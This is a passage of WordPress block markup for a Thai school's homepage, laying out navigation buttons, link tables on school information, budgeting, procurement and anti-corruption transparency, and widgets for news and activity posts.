900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" 